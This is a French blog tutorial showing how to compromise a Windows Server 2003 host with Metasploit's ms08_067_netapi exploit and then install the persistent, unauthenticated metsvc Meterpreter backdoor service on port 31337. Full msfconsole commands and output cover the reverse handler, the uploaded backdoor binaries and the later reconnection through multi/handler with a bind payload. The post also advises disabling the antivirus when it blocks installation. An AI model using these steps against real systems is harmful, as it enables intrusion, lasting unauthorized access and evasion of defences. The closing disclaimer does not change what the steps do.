Metasploit - Meterpreter Backdoor Service

Après avoir exploité une machine, c'est toujours sympa pratique de garder la main dessus et de revenir dans le système compromis plus tard. De cette manière, si le service vulnérable est patché un jour, il y a toujours une porte d'entrée donc pas besoin de repartir à la recherche de failles. 

Alexander Sotirov est le créateur de cette fameuse backdoor, nommé metsvc. Elle a été intégrée au framework Metasploit qui permet d'avoir accès à un (ou plusieurs)  shell Meterpreter à tout moment.


Attention

Metsvc ne nécessite pas d'authentification sur la machine cible, c'est à dire que quiconque pourrait accéder à votre backdoor. Ce n'est pas une bonne chose si vous effectuez un test de pénétration dans les normes.

Néanmoins, il est toujours possible de modifier les sources pour mettre en place un mécanisme d'authentification, ou tout autre moyen de rendre l'accès privé.


La machine cible est un Windows Server 2003 SP2 avec l'adresses IP 192.168.0.5. On exploitera la cible avec la faille ms08_067_netapi à titre d'exemple.

root@localhost ~ $ sudo msfconsole
msf > use exploit/windows/smb/m08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.5
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.0.5
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.5:1029) at Sat Sep 24 14:23:07 +0200 2011
meterpreter > sysinfo
System Language : fr_FR
OS              : Windows .NET Server (Build 3790,Service Pack 2)
Computer        : SERVER-2003
Architecture    : x86
Meterpreter     : x86/win32


La première étape est faite, nous avons pris le contrôle de la cible.


meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\WxBSAljEtqpJc...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
     * Installing service metsvc
 * Starting service
Service metsvc successfully installed.
 

On installe la backdoor en saisissant run metsvc. Cela ouvre le port 31337 (pour la petite anecdote, 31337 = ELEET = élite). Elle sera active en permanence, même après un reboot.

On va relancer la machine cible, ce n'est pas une obligation, c'est simplement pour l'exemple.


Du coté de Metasploit, on va ce préparer à reprendre la main :


msf > use exploit/multi/handler
msf  exploit(handler) > set RHOST 192.168.0.5
RHOST => 192.168.0.5
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 2 opened (192.168.0.2:56854 -> 192.168.0.5:31337) at Sat Sep 24 14:41:16 +0200 2011

meterpreter > sysinfo
System Language : fr_FR
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : SERVER-2003
Architecture    : x86
Meterpreter     : x86/win32

  • RHOST          c'est l'adresse IP de la cible précédemment infectée
  • LPORT          le port, soit 31337.
  • PAYLOAD      le payload a utiliser, windows/metsvc_bind_tcp.


BINGO !


Si pendant l'exécution de run metsvc une erreur s'affiche, c'est certainement l'antivirus qui bloque l'installation du service. Dans ce cas, il faut mettre hors service l'AV ou tuer tout les services qui ce reportent à lui.


Il est possible également d'enlever la backdoor avec la commande suivante : run metsvc -r (à rentrer dans la session Meterpreter).


Il est bien sûr interdit de jouer avec ça sur le PC du voisin, de belle-maman, ou du prof.
Plus sérieusement, à n'utiliser que pour un usage personnel, sans mauvaises intentions.




Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)